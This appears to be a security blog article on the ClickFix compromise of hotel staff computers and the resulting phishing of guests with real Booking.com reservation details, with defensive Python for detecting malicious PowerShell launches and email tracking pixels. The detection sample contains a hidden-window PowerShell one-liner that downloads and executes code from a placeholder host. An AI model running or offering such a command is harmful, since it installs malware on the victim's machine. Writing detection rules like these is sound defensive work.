
Jun 01, 2026 · 6 min read

350 Hotels Compromised, 6M Guest Stays Get Phishing Emails

Gen Digital's Norton research team published a May 28, 2026 report documenting at least 350 compromised accommodations across 50 countries—reached not through a Booking.com breach but through ClickFix attacks that turned hotel staff into the entry point. The downstream effect is targeted phishing emails sitting in roughly six million guests' inboxes a year, each one quoting a real reservation.

The Reservation Hijack scam is what targeted email phishing looks like when the attacker holds your actual booking. They know which hotel you booked, which dates you arrive, what you paid, the room type, the name on the reservation, and the email address you used. The phishing message lands at the moment you would expect a real one—a few days before check-in, when the hotel front desk often does send a real "please confirm your card details" follow-up. The fake message is indistinguishable from the real workflow because it is the real workflow, with a different payment link.

Key Takeaways

  • Gen Digital's Norton team, led by Luis Corrons and malware researcher Martin Chlumecký, documented 350 compromised hotels and accommodations across 50 countries in a report published May 28, 2026.
  • Five European countries account for 159 of the 350 properties: Germany (49), France (35), the United Kingdom (31), Italy (24), and Spain (20); the United States adds 19, and the rest are spread across 44 other countries.
  • The compromise vector is not a Booking.com breach but a ClickFix attack on hotel staff—employees follow what looks like a "computer fix" prompt and install malware that hands their reservation system access to the attacker.
  • With 82,000 simultaneous guest capacity across the affected properties, Gen Digital estimates 6 million guest stays a year are exposed to follow-up scams that arrive with real booking details intact.
  • Scam messages reach victims through email, SMS, WhatsApp, and the in-app messaging built into Booking.com itself—every channel where a real hotel might legitimately contact a guest before check-in.

How Does the Reservation Hijack Scam Actually Reach You?

Most phishing depends on the recipient ignoring small inconsistencies. The Reservation Hijack scam has none of the inconsistencies. The message comes from the right context (an upcoming stay), at the right time (a few days before check-in), with the right details (your name, your reservation number, your booked dates, the room you actually selected). It arrives on the channel the hotel ordinarily uses—often the Booking.com in-app messaging thread that already contains the original reservation confirmation.

According to Gen Digital's research report, scammers most commonly impersonate the hotel front desk asking for an additional card verification, a deposit, or a "missed payment" on the reservation. The link in the message routes to a fraudulent page that is customized for the specific accommodation—the hotel's logo, color scheme, and even photographs are pulled from the real property's listing, so visually the page is correct. The form behind the page captures the new card number and CVV the guest enters, and the scam keeps moving to the next reservation in the queue.

This is not a one-shot phishing campaign. Because the attacker holds the live reservation system access, every new booking made to the affected hotel generates a fresh target with fresh data. The same scam runs continuously until the hotel detects the unauthorized access and revokes the credential.

Why Are Booking.com Partners Easier to Compromise Than Booking.com Itself?

Booking.com runs central security on its core platform—two-factor authentication, anomalous login detection, the standard SaaS defenses. The 350 compromised properties are not the platform; they are the individual hotel staff accounts that connect to the partner extranet to manage reservations. Hotel front-desk computers tend to be older Windows machines used for many things besides Booking, and the staff who log in are not security trained.

The ClickFix technique exploits exactly that profile. The staffer receives an email referencing a guest complaint, an "urgent" reservation issue, or a system update. The message directs them to a webpage with a "verify you are human" panel that asks them to press Win+R, paste a string, and press Enter. The string runs a PowerShell command that downloads an infostealer or remote access trojan. From the moment the staffer pastes and presses Enter, the attacker has the Booking.com partner credentials, the desktop session, and whatever else the front office computer can reach. We have covered the underlying ClickFix mechanism in the Ghost CMS ClickFix 700 sites campaign and in the ClickFix Windows Terminal Lumma Stealer case—the same delivery primitive, different targets.
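As an added illustration (not from the Norton report or this article), the following Python triage encodes the ClickFix shape described above as a detection rule: a PowerShell process spawned directly by explorer.exe (what the Win+R Run dialog produces) whose command line fetches and executes remote content. The event field names and the sample telemetry are constructed for this example; the URL is a placeholder, not an indicator.

```python
import re
from dataclasses import dataclass

# Constructed, simplified process-creation record (the shape of a Sysmon
# Event ID 1 or Windows 4688 event); field names are this example's own.
@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str

SHELLS = ("powershell.exe", "pwsh.exe")
# Download cmdlets/aliases, execution of fetched text, and window-hiding or
# policy-bypass switches typical of a pasted one-liner.
DOWNLOAD = re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
HIDE = re.compile(r"-(w(indowstyle)?\s+hidden|nop|noprofile|e(xecution)?p(olicy)?\s+bypass|enc(odedcommand)?)\b", re.I)

def clickfix_reasons(ev):
    """Return the indicators an event matches; an empty list means no match."""
    reasons = []
    if ev.image.lower().rsplit("\\", 1)[-1] not in SHELLS:
        return reasons
    # Win+R runs the pasted string directly under explorer.exe, unlike
    # PowerShell started from a terminal, IDE, or scheduled task.
    if ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("shell spawned by explorer.exe (Run dialog)")
    if DOWNLOAD.search(ev.command_line):
        reasons.append("downloads remote content")
    if EXECUTE.search(ev.command_line):
        reasons.append("executes fetched content")
    if HIDE.search(ev.command_line):
        reasons.append("hidden window / profile or policy bypass")
    return reasons

def triage(events, min_reasons=2):
    """Hosts and users whose events stack enough indicators to alert on."""
    return [(ev.host, ev.user, r) for ev in events
            if len(r := clickfix_reasons(ev)) >= min_reasons]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry: one ClickFix-style launch, one bare shell
# opened from the desktop, one admin session from Windows Terminal.
SAMPLE_EVENTS = [
    ProcessEvent("FRONTDESK-01", "reception", r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'),
    ProcessEvent("FRONTDESK-01", "reception", r"C:\Windows\explorer.exe", PS, "powershell"),
    ProcessEvent("IT-ADMIN-02", "admin", r"C:\Program Files\WindowsApps\WindowsTerminal.exe", PS,
                 "powershell -NoProfile -Command Get-Service Spooler"),
]
```

Requiring two stacked indicators keeps an admin's `-NoProfile` session and a staffer simply opening PowerShell from the desktop below the alert threshold, while the pasted one-liner hits all four.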

What Exactly Do the Scammers Have on You?

Once a hotel's Booking.com partner extranet account is compromised, the attacker reads every reservation in the system. For each guest, that yields:

  • Full guest name as it appears on the booking.
  • Email address provided at booking.
  • Phone number, when provided.
  • Check-in and check-out dates.
  • Room type, number of guests, and any special requests typed into the booking notes.
  • Payment details captured by Booking.com at reservation time, often including masked or partial card numbers and billing address.
  • Property-specific context like "guest mentioned they are arriving late," "guest is traveling with a baby," or "guest requested a quieter room"—every detail a guest casually types into a booking note becomes ammunition.

That context is what makes the follow-up phishing so effective. A scammer writing "We need to verify the card on file for your check-in on June 14 with the king bed and the late arrival you noted" cannot be defeated by any visual phishing tell. The details are real.

How Do You Protect Yourself Before Your Next Trip?

There is no defense that depends on noticing inconsistencies in the scam message, because the message is internally consistent. The defenses that actually work are channel-based and behavioral:

  1. Never enter card details on a link you received. If a hotel says they need card verification, hang up or close the message, then log into Booking.com directly through the app or the bookmarked website and check the reservation page yourself. Real verification requests are also visible in the Booking.com app, not just in email.
  2. Call the hotel's main reception number from the property's official website. Not the number in the suspicious message. The phone tree of any real hotel can tell you in 30 seconds whether they actually sent the message.
  3. Use a virtual card or single-use card number for booking deposits. Apple Pay's per-merchant card, Privacy.com, Revolut virtual cards, and most major bank apps now offer this. If a virtual card is exposed in the next Reservation Hijack wave, you can disable it without affecting your real card.
  4. Block tracking pixels in your booking confirmation emails. Email tracking pixels in hotel and travel marketing reveal when you opened the message, which device you used, and roughly where you were—exactly the signals a scammer would use to time the follow-up. Gblock strips those pixels out of Gmail before they call home, so a compromised hotel partner who is monitoring "did the guest open the confirmation" does not get a useful answer.
  5. Treat WhatsApp and SMS messages about your booking with extra skepticism. Most legitimate hotels do not initiate WhatsApp or SMS exchanges about payment changes. Those channels are heavily favored by Reservation Hijack scammers because they are harder for Booking.com to monitor.
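To make point 4 concrete, here is an added Python example (not Gblock's code or the article's) that finds the tracking pixels in a booking-confirmation email: remote images that are 1x1 or smaller, or hidden with CSS, and so exist only to report the open. The sample HTML and hostnames are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

def _dim(value):
    """Parse a width/height attribute such as '1', '1px' or '100%' to an int."""
    if value is None:
        return None
    digits = "".join(ch for ch in value.strip() if ch.isdigit())
    return int(digits) if digits else None

class PixelFinder(HTMLParser):
    """Collect (src, reason) for <img> tags that behave like tracking pixels."""
    def __init__(self):
        super().__init__()
        self.pixels = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        # Only a remote fetch can report back; inline/cid images cannot.
        if urlsplit(src).scheme not in ("http", "https"):
            return
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        reason = None
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reason = "1x1 or smaller"
        elif "display:none" in style or "visibility:hidden" in style:
            reason = "hidden via CSS"
        elif "width:0" in style or "height:0" in style:
            reason = "zero-sized via CSS"
        if reason:
            self.pixels.append((src, reason))

def find_tracking_pixels(html):
    parser = PixelFinder()
    parser.feed(html)
    parser.close()
    return parser.pixels

# Constructed confirmation fragment: one real logo, two trackers, one cid image.
SAMPLE_EMAIL = """<html><body>
<img src="https://cdn.example.invalid/hotel-logo.png" width="200" height="60" alt="Hotel">
<p>Your reservation for 14 June is confirmed.</p>
<img src="https://track.example.invalid/o?id=abc123" width="1" height="1" alt="">
<img src="https://track.example.invalid/p.gif" style="display:none; width:0">
<img src="cid:map" width="1" height="1">
</body></html>"""
```

A blocker such as the one described above would strip or rewrite the two flagged `src` values before the client renders the message; the logo, being visible, is left alone.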

What Booking.com Could Do Differently

The structural fix is on Booking.com's side. The partner extranet is the credential surface that attackers want; hardening it is what would shut down the Reservation Hijack pipeline. Hardware-key MFA for all partner accounts above a certain reservation volume, phishing-resistant authentication for the in-app messaging system, and an explicit "your hotel will never ask you to pay through this link" warning embedded in every guest-facing message would all reduce the blast radius. Until those changes ship, the burden is on travelers to assume that any payment request after the initial booking is hostile until verified out of band.

Why This Should Worry Every Traveler

Gen Digital's 350 properties is the number the researchers could clearly verify. The actual scale is almost certainly larger—every property that has been compromised but not yet documented is still pumping reservation data to scammers. With 6 million guest stays a year passing through the visible subset alone, the Reservation Hijack scam is likely the most successful targeted phishing campaign in the travel sector right now, and the people who pay are travelers who did everything they were told to do: booked through a major platform, used a reputable hotel, and trusted the email in their inbox.
